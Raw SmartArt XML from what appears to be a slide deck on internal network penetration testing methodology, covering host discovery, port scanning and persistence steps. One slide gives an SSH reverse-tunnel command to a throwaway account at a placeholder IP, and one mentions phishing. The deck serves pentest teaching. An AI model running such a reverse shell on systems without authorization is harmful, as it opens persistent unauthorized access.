      <dgm:prSet presAssocID="{4F28B243-8953-4C0C-A850-FC1B9FC23014}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8A6F1EA7-F0B2-44DB-A712-1FA54A1B57D6}" type="pres">
      <dgm:prSet presAssocID="{9B6FBD30-B68E-42EA-BDF2-6D4CEA56FC7F}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0EC34BD3-2C93-417B-88C1-EF53B36A7813}" type="pres">
      <dgm:prSet presAssocID="{1AEECD56-29BF-4BD1-9090-B02E6AA85C92}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D07E7B88-2F10-42A1-A399-9027EC977BCC}" type="pres">
      <dgm:prSet presAssocID="{1AEECD56-29BF-4BD1-9090-B02E6AA85C92}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C8A2B6E0-571E-42FF-96EA-F45168ADBAA7}" type="pres">
      <dgm:prSet presAssocID="{E4419167-9A32-406A-84A4-91B96EDB89C6}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4C30AB2A-BEA4-4FF7-9249-A332FC473159}" type="pres">
      <dgm:prSet presAssocID="{9450CCCE-9FEF-4176-9438-5B9F19E0F7BC}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0B3C1494-5B3D-40E2-BE59-7926D8CF4F66}" type="pres">
      <dgm:prSet presAssocID="{9450CCCE-9FEF-4176-9438-5B9F19E0F7BC}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{362E644A-1BE4-4C60-B574-E3819A0EECEB}" type="pres">
      <dgm:prSet presAssocID="{F099BF88-91E3-40A1-A98A-844E8AD720C8}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{24938DF2-A889-4F57-8DDF-8030988E3F39}" type="pres">
      <dgm:prSet presAssocID="{3CB8D9EF-4DB0-4F67-BF33-EBB2735B536E}" presName="sibTrans" presStyleLbl="sibTrans1D1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A41849AA-0696-4472-BA99-2FB01F258318}" type="pres">
      <dgm:prSet presAssocID="{3CB8D9EF-4DB0-4F67-BF33-EBB2735B536E}" presName="connectorText" presStyleLbl="sibTrans1D1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E1CFEE78-32C0-423F-80D7-647EC914687F}" type="pres">
      <dgm:prSet presAssocID="{C5CA560D-47A9-4517-A604-89D6141AADE3}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{EBC12700-0797-433B-99C4-727F6403EBE4}" type="presOf" srcId="{C5CA560D-47A9-4517-A604-89D6141AADE3}" destId="{E1CFEE78-32C0-423F-80D7-647EC914687F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{07A51B18-AB69-4041-A70E-977514A61A4A}" type="presOf" srcId="{9450CCCE-9FEF-4176-9438-5B9F19E0F7BC}" destId="{0B3C1494-5B3D-40E2-BE59-7926D8CF4F66}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{4A1C1520-2436-45EF-BD52-A2935D6377AE}" type="presOf" srcId="{3CB8D9EF-4DB0-4F67-BF33-EBB2735B536E}" destId="{24938DF2-A889-4F57-8DDF-8030988E3F39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{B9071322-FE3D-4335-BB77-C32FC4E16796}" type="presOf" srcId="{F099BF88-91E3-40A1-A98A-844E8AD720C8}" destId="{362E644A-1BE4-4C60-B574-E3819A0EECEB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{C7DD5F34-52C4-4A32-8944-54EB09297930}" type="presOf" srcId="{1AEECD56-29BF-4BD1-9090-B02E6AA85C92}" destId="{D07E7B88-2F10-42A1-A399-9027EC977BCC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{6EC24042-88FC-439C-BA9B-67C27918866D}" srcId="{11305232-84BA-4227-AD08-C8DB50105805}" destId="{9B6FBD30-B68E-42EA-BDF2-6D4CEA56FC7F}" srcOrd="1" destOrd="0" parTransId="{4E912C6B-0182-413E-93F0-BF806409B471}" sibTransId="{1AEECD56-29BF-4BD1-9090-B02E6AA85C92}"/>
    <dgm:cxn modelId="{0B3CF66B-1F3D-4B55-B5DB-90C826F42E3D}" type="presOf" srcId="{9B6FBD30-B68E-42EA-BDF2-6D4CEA56FC7F}" destId="{8A6F1EA7-F0B2-44DB-A712-1FA54A1B57D6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{D3C4DB6C-B3FF-4C4F-BC0F-66605433BA87}" type="presOf" srcId="{9450CCCE-9FEF-4176-9438-5B9F19E0F7BC}" destId="{4C30AB2A-BEA4-4FF7-9249-A332FC473159}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{2EC57176-CCE3-4673-91B3-306047C126FF}" srcId="{11305232-84BA-4227-AD08-C8DB50105805}" destId="{F099BF88-91E3-40A1-A98A-844E8AD720C8}" srcOrd="3" destOrd="0" parTransId="{116C45A4-EDA4-40EF-BF8E-8DBD286F66DA}" sibTransId="{3CB8D9EF-4DB0-4F67-BF33-EBB2735B536E}"/>
    <dgm:cxn modelId="{F41CDB7A-3E91-4BC9-9991-99B36764675B}" srcId="{11305232-84BA-4227-AD08-C8DB50105805}" destId="{E4419167-9A32-406A-84A4-91B96EDB89C6}" srcOrd="2" destOrd="0" parTransId="{0B733EA8-7316-495E-8526-D3D9C3AC152E}" sibTransId="{9450CCCE-9FEF-4176-9438-5B9F19E0F7BC}"/>
    <dgm:cxn modelId="{EC091A7E-A84D-4819-9B47-85E7A2ABAEC2}" srcId="{11305232-84BA-4227-AD08-C8DB50105805}" destId="{81CD59E7-5704-4176-B626-8FE068BB09A3}" srcOrd="0" destOrd="0" parTransId="{83CE10C3-76BF-4715-A7B3-43C32043A404}" sibTransId="{4F28B243-8953-4C0C-A850-FC1B9FC23014}"/>
    <dgm:cxn modelId="{C2602E8A-09BC-4009-B8D1-F14ED94BE98D}" srcId="{11305232-84BA-4227-AD08-C8DB50105805}" destId="{C5CA560D-47A9-4517-A604-89D6141AADE3}" srcOrd="4" destOrd="0" parTransId="{ED9B381B-B987-44F4-AF21-7BA320EBE684}" sibTransId="{51731C32-C4C1-453C-AB73-D3199E5A37A3}"/>
    <dgm:cxn modelId="{482114A2-8E01-40D8-B8E3-E3E8FF34D94A}" type="presOf" srcId="{4F28B243-8953-4C0C-A850-FC1B9FC23014}" destId="{990D55F0-1518-4522-8611-910C20D69969}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{ADF6F5B7-115D-4D32-89B6-0F0685058C9E}" type="presOf" srcId="{81CD59E7-5704-4176-B626-8FE068BB09A3}" destId="{B8437356-5A2E-4971-9BEC-D61C7C1473B7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{7BD1E4CC-4866-4ECB-9352-4709BAE16039}" type="presOf" srcId="{4F28B243-8953-4C0C-A850-FC1B9FC23014}" destId="{6754B2F4-DD2F-4E46-88F8-3B543245138A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{7F7B84D2-4AD9-48F5-90F9-4EDF2CCBD3D2}" type="presOf" srcId="{11305232-84BA-4227-AD08-C8DB50105805}" destId="{EA11BB8F-4EF7-4DE2-BB79-C3C93C216DE4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{D06EE1DD-C7BF-486C-8D92-0F045B8D27DF}" type="presOf" srcId="{E4419167-9A32-406A-84A4-91B96EDB89C6}" destId="{C8A2B6E0-571E-42FF-96EA-F45168ADBAA7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{99B147DF-ED36-4828-8CE1-A467249DC776}" type="presOf" srcId="{3CB8D9EF-4DB0-4F67-BF33-EBB2735B536E}" destId="{A41849AA-0696-4472-BA99-2FB01F258318}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{A48DBFE6-E359-48DF-9560-E85F00E8D96F}" type="presOf" srcId="{1AEECD56-29BF-4BD1-9090-B02E6AA85C92}" destId="{0EC34BD3-2C93-417B-88C1-EF53B36A7813}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{45C6DFC6-FC83-4E04-9628-2E1D1104C26A}" type="presParOf" srcId="{EA11BB8F-4EF7-4DE2-BB79-C3C93C216DE4}" destId="{B8437356-5A2E-4971-9BEC-D61C7C1473B7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{232D49A1-1293-4A7A-8544-BD87386BE22B}" type="presParOf" srcId="{EA11BB8F-4EF7-4DE2-BB79-C3C93C216DE4}" destId="{6754B2F4-DD2F-4E46-88F8-3B543245138A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{EAB974F7-97B7-4B4A-BD1A-940ACD89BE80}" type="presParOf" srcId="{6754B2F4-DD2F-4E46-88F8-3B543245138A}" destId="{990D55F0-1518-4522-8611-910C20D69969}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{505ACF42-65C6-470D-BC17-768F83CD09AD}" type="presParOf" srcId="{EA11BB8F-4EF7-4DE2-BB79-C3C93C216DE4}" destId="{8A6F1EA7-F0B2-44DB-A712-1FA54A1B57D6}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{ACC6B8F4-3E94-40E9-9884-0842D233C996}" type="presParOf" srcId="{EA11BB8F-4EF7-4DE2-BB79-C3C93C216DE4}" destId="{0EC34BD3-2C93-417B-88C1-EF53B36A7813}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{A910B403-523D-47E0-8499-EB9AB15C7793}" type="presParOf" srcId="{0EC34BD3-2C93-417B-88C1-EF53B36A7813}" destId="{D07E7B88-2F10-42A1-A399-9027EC977BCC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{F6345840-267A-4B81-8017-48A5E3EA8479}" type="presParOf" srcId="{EA11BB8F-4EF7-4DE2-BB79-C3C93C216DE4}" destId="{C8A2B6E0-571E-42FF-96EA-F45168ADBAA7}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{FA360E39-6228-43FF-B4B3-2E256ECF07F1}" type="presParOf" srcId="{EA11BB8F-4EF7-4DE2-BB79-C3C93C216DE4}" destId="{4C30AB2A-BEA4-4FF7-9249-A332FC473159}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{20CD8581-131A-4693-898A-6AEC12BCB733}" type="presParOf" srcId="{4C30AB2A-BEA4-4FF7-9249-A332FC473159}" destId="{0B3C1494-5B3D-40E2-BE59-7926D8CF4F66}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{7DB92CD9-13E4-4E96-9EB2-609653CE22A7}" type="presParOf" srcId="{EA11BB8F-4EF7-4DE2-BB79-C3C93C216DE4}" destId="{362E644A-1BE4-4C60-B574-E3819A0EECEB}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{00B28504-C2FC-4757-8437-F5CB87D99F17}" type="presParOf" srcId="{EA11BB8F-4EF7-4DE2-BB79-C3C93C216DE4}" destId="{24938DF2-A889-4F57-8DDF-8030988E3F39}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{15321B39-8D05-4712-BA4D-E2CFDC6C3CB9}" type="presParOf" srcId="{24938DF2-A889-4F57-8DDF-8030988E3F39}" destId="{A41849AA-0696-4472-BA99-2FB01F258318}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{E9616350-92AE-4027-8324-71A168D407EC}" type="presParOf" srcId="{EA11BB8F-4EF7-4DE2-BB79-C3C93C216DE4}" destId="{E1CFEE78-32C0-423F-80D7-647EC914687F}"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FBBAB-71C3-4C1B-A5C8-657FA4CDF1B1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2817" y="593689"/>
          <a:ext cx="2235464" cy="1341278"/>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Internal Network Penetration Testing Methodology</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2817" y="593689"/>
        <a:ext cx="2235464" cy="1341278"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CD20B7AA-74C6-4804-84AE-019724EDA9CD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2461828" y="593689"/>
          <a:ext cx="2235464" cy="1341278"/>
        </a:xfrm>
        <a:prstGeom prst="rec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Purpose of Internal Network Penetration Testing</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2461828" y="593689"/>
        <a:ext cx="2235464" cy="1341278"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1CF55B01-8050-4690-8477-6A0424D26789}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4920839" y="593689"/>
          <a:ext cx="2235464" cy="1341278"/>
        </a:xfrm>
        <a:prstGeom prst="rec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Key Considerations of Internal Testing</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4920839" y="593689"/>
        <a:ext cx="2235464" cy="1341278"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8F4488FB-2CBB-410F-84B2-4F8CFD8620BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7379850" y="593689"/>
          <a:ext cx="2235464" cy="1341278"/>
        </a:xfrm>
        <a:prstGeom prst="rec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Exposing the Internal Network/Secondary Access</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7379850" y="593689"/>
        <a:ext cx="2235464" cy="1341278"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17857C2A-DC42-4822-9943-4E949A48B699}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2817" y="2158514"/>
          <a:ext cx="2235464" cy="1341278"/>
        </a:xfrm>
        <a:prstGeom prst="rec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Defensive SSH Measures</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2817" y="2158514"/>
        <a:ext cx="2235464" cy="1341278"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{26DB0420-CE37-4AF8-968A-3F3B5D799DE4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2461828" y="2158514"/>
          <a:ext cx="2235464" cy="1341278"/>
        </a:xfrm>
        <a:prstGeom prst="rec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Host Discovery Methods</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2461828" y="2158514"/>
        <a:ext cx="2235464" cy="1341278"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1CE5B2BB-B647-4C52-B7E2-E44F252552BF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4920839" y="2158514"/>
          <a:ext cx="2235464" cy="1341278"/>
        </a:xfrm>
        <a:prstGeom prst="rec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Port Scanning (Internal Network)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4920839" y="2158514"/>
        <a:ext cx="2235464" cy="1341278"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{69A34115-9DF9-48F1-B644-8C9E7BABE926}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7379850" y="2158514"/>
          <a:ext cx="2235464" cy="1341278"/>
        </a:xfrm>
        <a:prstGeom prst="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Enumerating firewalled services</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7379850" y="2158514"/>
        <a:ext cx="2235464" cy="13412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966A8-19A2-4944-ADFA-258A5672E961}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2921763"/>
          <a:ext cx="2149078" cy="958987"/>
        </a:xfrm>
        <a:prstGeom prst="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842" tIns="135128" rIns="152842" bIns="135128" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
            <a:t>Establish Reverse Shell</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2921763"/>
        <a:ext cx="2149078" cy="958987"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AA9A46A6-3A44-4748-B5D0-D4A2EDE73618}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2149077" y="2921763"/>
          <a:ext cx="6447234" cy="958987"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:alpha val="90000"/>
            <a:tint val="40000"/>
            <a:hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="12700" cap="rnd"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0780" tIns="177800" rIns="130780" bIns="177800" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t>Generate new keypair on target environment and establish a reverse shell using: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1"/>
            <a:t>ssh</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t> –</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1"/>
            <a:t>fN</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t> –R 2200:127.0.0.1:22 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1"/>
            <a:t>throwaway-account@IP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t>  –</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1"/>
            <a:t>i</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t>  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1"/>
            <a:t>id_rsa</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2149077" y="2921763"/>
        <a:ext cx="6447234" cy="958987"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{75D4DB8A-44BC-4202-B8E1-B84504161224}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="0" y="1461224"/>
          <a:ext cx="2149078" cy="1474923"/>
        </a:xfrm>
        <a:prstGeom prst="upArrowCallout">
          <a:avLst>
            <a:gd name="adj1" fmla="val 5000"/>
            <a:gd name="adj2" fmla="val 10000"/>
            <a:gd name="adj3" fmla="val 15000"/>
            <a:gd name="adj4" fmla="val 64977"/>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842" tIns="135128" rIns="152842" bIns="135128" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
            <a:t>Generate keypair</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-10800000">
        <a:off x="0" y="1461224"/>
        <a:ext cx="2149078" cy="958700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B0C93D81-48F5-4568-AB72-9AFD2D89C154}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2149077" y="1461224"/>
          <a:ext cx="6447234" cy="958700"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:alpha val="90000"/>
            <a:tint val="40000"/>
            <a:hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="12700" cap="rnd"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0780" tIns="177800" rIns="130780" bIns="177800" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t>Make SSH key access available on attacking machine to automate SSH key access when executing any phishing attacks and generate new keypair on target environment.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2149077" y="1461224"/>
        <a:ext cx="6447234" cy="958700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BE3D5627-CAF3-4CE0-AF36-6240D59104BD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="0" y="686"/>
          <a:ext cx="2149078" cy="1474923"/>
        </a:xfrm>
        <a:prstGeom prst="upArrowCallout">
          <a:avLst>
            <a:gd name="adj1" fmla="val 5000"/>
            <a:gd name="adj2" fmla="val 10000"/>
            <a:gd name="adj3" fmla="val 15000"/>
            <a:gd name="adj4" fmla="val 64977"/>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842" tIns="135128" rIns="152842" bIns="135128" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
            <a:t>Make throwaway account</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-10800000">
        <a:off x="0" y="686"/>
        <a:ext cx="2149078" cy="958700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7F4618C8-3311-455B-84E8-E531E4625D69}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2149077" y="686"/>
          <a:ext cx="6447234" cy="958700"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
